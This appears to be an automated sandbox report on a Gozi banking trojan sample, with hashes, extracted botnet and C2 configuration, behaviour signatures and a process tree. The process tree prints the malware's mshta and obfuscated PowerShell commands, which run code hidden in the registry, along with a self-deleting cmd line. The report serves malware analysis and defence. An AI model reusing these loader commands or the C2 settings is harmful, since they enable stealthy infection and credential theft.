Overview

overview

10

Static

static

3

7665e79318...e6.exe

windows7-x64

10

7665e79318...e6.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-10-2023 16:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6.exe

  • Size

    304KB

  • MD5

    a3f4c907a088c99a8b7bf5f4280d7d0c

  • SHA1

    9a9297bd0af1c008eb7477c1e310ce70c30c6d56

  • SHA256

    7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6

  • SHA512

    106a0a4275a421a6dbef6c43e76921e6eae1aca5f6d960f823763a3127b7ebf826c626da460db82451aba4a94c32c8c198d6871b0a2c6de7d96c937384e92f9b

  • SSDEEP

    6144:Oo+91vDNpa6NK56upTHirwtc3nhBvjQOR/Oz2IHTN+:ONDLu4K56u1HqfhBvjQOWz2W

Score
10/10
gozi5050bankerdaveisfbtrojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

systemcheck.top
Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

    bankertrojangozi
  • Dave packer 1 IoCs

    Detects executable using a packer named 'Dave' by the community, based on a string at the end.

    dave
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:4792
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:3952
      • C:\Windows\System32\RuntimeBroker.exe
        C:\Windows\System32\RuntimeBroker.exe -Embedding
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3752
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of UnmapMainImage
        • Suspicious use of WriteProcessMemory
        PID:3176
        • C:\Users\Admin\AppData\Local\Temp\7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6.exe
          "C:\Users\Admin\AppData\Local\Temp\7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6.exe"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4060
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ljll='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ljll).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\79A35AC8-8476-1390-56BD-F8F7EA41AC1B\\\CharControl'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1804
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name dkkcle -value gp; new-alias -name vxopmgiwy -value iex; vxopmgiwy ([System.Text.Encoding]::ASCII.GetString((dkkcle "HKCU:Software\AppDataLow\Software\Microsoft\79A35AC8-8476-1390-56BD-F8F7EA41AC1B").TimeAbout))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:532
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iwzmq0ox\iwzmq0ox.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4528
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBA91.tmp" "c:\Users\Admin\AppData\Local\Temp\iwzmq0ox\CSC4BB6E54E94594BB59060E63DFA3939FD.TMP"
                5⤵
                  PID:3320
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wdcktwgy\wdcktwgy.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1048
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBBE8.tmp" "c:\Users\Admin\AppData\Local\Temp\wdcktwgy\CSC9A1AF47670A34C5ABEB2653313BDF4DC.TMP"
                  5⤵
                    PID:4336
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6.exe"
              2⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:1800
              • C:\Windows\system32\PING.EXE
                ping localhost -n 5
                3⤵
                • Runs ping.exe
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:440
            • C:\Windows\syswow64\cmd.exe
              "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
              2⤵
                PID:3840
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
              • Modifies registry class
              PID:3148

            Network

            MITRE ATT&CK Matrix ATT&CK v13

            Initial Access

            Execution

            Persistence

            Privilege Escalation

            Defense Evasion

            Credential Access

            Discovery

            Query Registry

            1
            T1012

            System Information Discovery

            2
            T1082

            Remote System Discovery

            1
            T1018

            Lateral Movement

            Collection

            Exfiltration

            Command and Control

            Impact

            Resource Development

            Reconnaissance

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\RESBA91.tmp
              Filesize

              1KB

              MD5

              6de52d38e2e7205e0fce31567151551c

              SHA1

              d524a93438f1f3e1382c3512fca2611bc90624a3

              SHA256

              1a8087f1beca46db78496dfedb6b9698b22881d93bb090c9c829225f51359d71

              SHA512

              2b43c0a955313fc36ae3b7cf627213c796ed0faa1dfe3fa860f1861e021e8ff83d54f0e8e26a469d99ef2ed70ab8df4f78120983793c793d50f2e0ef4cc777fc

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\RESBBE8.tmp
              Filesize

              1KB

              MD5

              8685035ea4b0eae7724563d652e818aa

              SHA1

              f34d1c9a89a8de63572f5ccdca10560f777b6277

              SHA256

              616b8e528a2f017e9ac1ebdbd68bc26f145b7ea97ac3184179d3f5bc180b06cf

              SHA512

              e2a941c85a5a00f980ce89e4999e9882c519fde68fc219ef30b23ca3131a4fdf7453ce1a2a18fae129369f0943b1b59ca1520968db894997904c8ce8755d57e2

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o0dmjqkn.ggy.ps1
              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\iwzmq0ox\iwzmq0ox.dll
              Filesize

              3KB

              MD5

              f578000dd6c6379a755d508658de8334

              SHA1

              3303d6674676f96dd47c949e8a741647d9cac88d

              SHA256

              b3d2dff22d3a95679c6085b33efe38f98c5d00df9918a3adcf0ca64c53a55dc6

              SHA512

              beedbbbd61601b09def37d001edc3e3a645080c417549b03bfce1d84add811f92968315852a9b205f8ea6288ca159bebd4e3c3d282d576d3a61fd5f5fc0d9792

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\wdcktwgy\wdcktwgy.dll
              Filesize

              3KB

              MD5

              eb98c761b4b3d83d18e41f458025ad99

              SHA1

              887561c4b5d7636c12f5f878741191aff10ff8a1

              SHA256

              d4a26bbf431c638e622dab0a60905afe10d487aeed6d73ad02c81b44fe2d7e44

              SHA512

              52559354070969f00cac2ecb155536addabd0df3462b0cd78c08537a98f63e5c545649bf290c087ee356132e3a4cb19b4738f8bcb4f363ac6044f84aa2cf6720

              Download Submit
            • \??\c:\Users\Admin\AppData\Local\Temp\iwzmq0ox\CSC4BB6E54E94594BB59060E63DFA3939FD.TMP
              Filesize

              652B

              MD5

              b4a8c655192f9eb72177526043072564

              SHA1

              8660bff88ba4e8c23cf1eb2720e511f1f25f6588

              SHA256

              8fdf42aca418ff487b3730dac68a0b134aa4a9951124d292fe371db6ad70fa4c

              SHA512

              4cb92ff04ff89dabd4e0a1e7af26836604280316b660beefaefc5a54684f86e6680b24344b8e322b85dd34ea3ba17841164f58ac12f69c2f0b2f0275106e106e

              Download Submit
            • \??\c:\Users\Admin\AppData\Local\Temp\iwzmq0ox\iwzmq0ox.0.cs
              Filesize

              405B

              MD5

              caed0b2e2cebaecd1db50994e0c15272

              SHA1

              5dfac9382598e0ad2e700de4f833de155c9c65fa

              SHA256

              21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

              SHA512

              86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

              Download Submit
            • \??\c:\Users\Admin\AppData\Local\Temp\iwzmq0ox\iwzmq0ox.cmdline
              Filesize

              369B

              MD5

              79671ea88f7fe9fa7f4c937036ce1fbe

              SHA1

              27be6edb0f06b6217d8e1cf7844c32cdeb02f3d5

              SHA256

              adec4572c7734dd58e7b3b6d10cd6756f2d6b3e643aef3dafb014fda5b724a84

              SHA512

              37d18aa16c4b39e63a9af01898d833bf245166f98e24f4f02b5e7ac8d48e8808ca67085d3ffc8f83f1b40ef69cb05649b1353b93452138b8483a8835c0dd548a

              Download Submit
            • \??\c:\Users\Admin\AppData\Local\Temp\wdcktwgy\CSC9A1AF47670A34C5ABEB2653313BDF4DC.TMP
              Filesize

              652B

              MD5

              3ed328d8e068a9c2d52ec26c6eceb4c2

              SHA1

              480e3215ab4abdd2d6b9fb9e6211a6b0501214f2

              SHA256

              12ea06829b168d20864f0d3d285607faf7f1ad118854dfea76d57983c4f853d3

              SHA512

              4bdafb6f1376a08da3c210ed08e8eb9ef894af4c04f2b0619826caac61861002b61a89b2374e3d077fb61b38cf430b1273be62a0ef2581304aad2e0deb9bc51b

              Download Submit
            • \??\c:\Users\Admin\AppData\Local\Temp\wdcktwgy\wdcktwgy.0.cs
              Filesize

              406B

              MD5

              ca8887eacd573690830f71efaf282712

              SHA1

              0acd4f49fc8cf6372950792402ec3aeb68569ef8

              SHA256

              568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

              SHA512

              2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

              Download Submit
            • \??\c:\Users\Admin\AppData\Local\Temp\wdcktwgy\wdcktwgy.cmdline
              Filesize

              369B

              MD5

              ca375449e553450ea318363ddca24ccc

              SHA1

              84e5bfd150c46bdab439c445cb35f696e55a7fc1

              SHA256

              800dd249c120309b69c5db83782406be70ebd43112991c1c5b4f7b944dcfd7d6

              SHA512

              1b8a4104acbc8a3d5806477e2d1fa47931a67b0eafdb3dae825dcf57ee75a4d28055e6f6f850319ff02c1d84e55abcc1b9a3dda667316d28b1c249f5c2d0855f

              Download Submit
            • memory/440-106-0x0000021E6BA30000-0x0000021E6BA31000-memory.dmp
              Filesize

              4KB

              Download
            • memory/440-104-0x0000021E6BB80000-0x0000021E6BC24000-memory.dmp
              Filesize

              656KB

              Download
            • memory/440-118-0x0000021E6BB80000-0x0000021E6BC24000-memory.dmp
              Filesize

              656KB

              Download
            • memory/532-69-0x00007FFEAC5E0000-0x00007FFEAD0A1000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/532-56-0x000001722C0D0000-0x000001722C10D000-memory.dmp
              Filesize

              244KB

              Download
            • memory/532-27-0x000001722BD20000-0x000001722BD30000-memory.dmp
              Filesize

              64KB

              Download
            • memory/532-26-0x000001722BD20000-0x000001722BD30000-memory.dmp
              Filesize

              64KB

              Download
            • memory/532-25-0x00007FFEAC5E0000-0x00007FFEAD0A1000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/532-15-0x000001722BD30000-0x000001722BD52000-memory.dmp
              Filesize

              136KB

              Download
            • memory/532-54-0x000001722C0C0000-0x000001722C0C8000-memory.dmp
              Filesize

              32KB

              Download
            • memory/532-70-0x000001722C0D0000-0x000001722C10D000-memory.dmp
              Filesize

              244KB

              Download
            • memory/532-40-0x000001722C0A0000-0x000001722C0A8000-memory.dmp
              Filesize

              32KB

              Download
            • memory/1800-117-0x000001EF25410000-0x000001EF254B4000-memory.dmp
              Filesize

              656KB

              Download
            • memory/1800-83-0x000001EF25410000-0x000001EF254B4000-memory.dmp
              Filesize

              656KB

              Download
            • memory/1800-84-0x000001EF25220000-0x000001EF25221000-memory.dmp
              Filesize

              4KB

              Download
            • memory/3148-120-0x0000021015140000-0x00000210151E4000-memory.dmp
              Filesize

              656KB

              Download
            • memory/3148-99-0x0000021014D90000-0x0000021014D91000-memory.dmp
              Filesize

              4KB

              Download
            • memory/3148-95-0x0000021015140000-0x00000210151E4000-memory.dmp
              Filesize

              656KB

              Download
            • memory/3176-58-0x0000000008720000-0x00000000087C4000-memory.dmp
              Filesize

              656KB

              Download
            • memory/3176-96-0x0000000008720000-0x00000000087C4000-memory.dmp
              Filesize

              656KB

              Download
            • memory/3176-59-0x00000000027A0000-0x00000000027A1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/3752-109-0x0000019CB2B00000-0x0000019CB2BA4000-memory.dmp
              Filesize

              656KB

              Download
            • memory/3752-72-0x0000019CB2B00000-0x0000019CB2BA4000-memory.dmp
              Filesize

              656KB

              Download
            • memory/3752-73-0x0000019CB24E0000-0x0000019CB24E1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/3840-105-0x00000000006F0000-0x0000000000788000-memory.dmp
              Filesize

              608KB

              Download
            • memory/3840-114-0x00000000006F0000-0x0000000000788000-memory.dmp
              Filesize

              608KB

              Download
            • memory/3840-112-0x0000000000540000-0x0000000000541000-memory.dmp
              Filesize

              4KB

              Download
            • memory/3840-115-0x00000000006F0000-0x0000000000788000-memory.dmp
              Filesize

              608KB

              Download
            • memory/3952-79-0x000001D689FD0000-0x000001D689FD1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/3952-78-0x000001D68A010000-0x000001D68A0B4000-memory.dmp
              Filesize

              656KB

              Download
            • memory/3952-116-0x000001D68A010000-0x000001D68A0B4000-memory.dmp
              Filesize

              656KB

              Download
            • memory/4060-5-0x0000000000400000-0x000000000040F000-memory.dmp
              Filesize

              60KB

              Download
            • memory/4060-1-0x0000000001210000-0x000000000121C000-memory.dmp
              Filesize

              48KB

              Download
            • memory/4060-0-0x0000000002E90000-0x0000000002E9F000-memory.dmp
              Filesize

              60KB

              Download
            • memory/4060-11-0x0000000002F00000-0x0000000002F0D000-memory.dmp
              Filesize

              52KB

              Download
            • memory/4792-89-0x0000020B4D450000-0x0000020B4D4F4000-memory.dmp
              Filesize

              656KB

              Download
            • memory/4792-90-0x0000020B4CBF0000-0x0000020B4CBF1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/4792-119-0x0000020B4D450000-0x0000020B4D4F4000-memory.dmp
              Filesize

              656KB

              Download